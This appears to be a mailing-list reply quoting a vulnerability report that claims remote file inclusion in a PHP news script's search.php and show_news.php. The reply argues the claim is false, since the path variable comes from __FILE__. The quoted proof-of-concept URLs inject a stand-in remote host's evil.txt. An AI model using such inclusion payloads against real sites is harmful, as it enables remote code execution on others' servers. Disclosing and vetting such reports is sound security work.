stormhacker@xxxxxxxxxxx wrote:
-----------------Description---------------
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
--------------PoC/Exploit----------------------
show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
$cutepath = __FILE__;$cutepath is set to script's working directory, so you can not set it manually.
--------------Solution--------------------- No Patch available.
As no needed? ;) Greets, satalin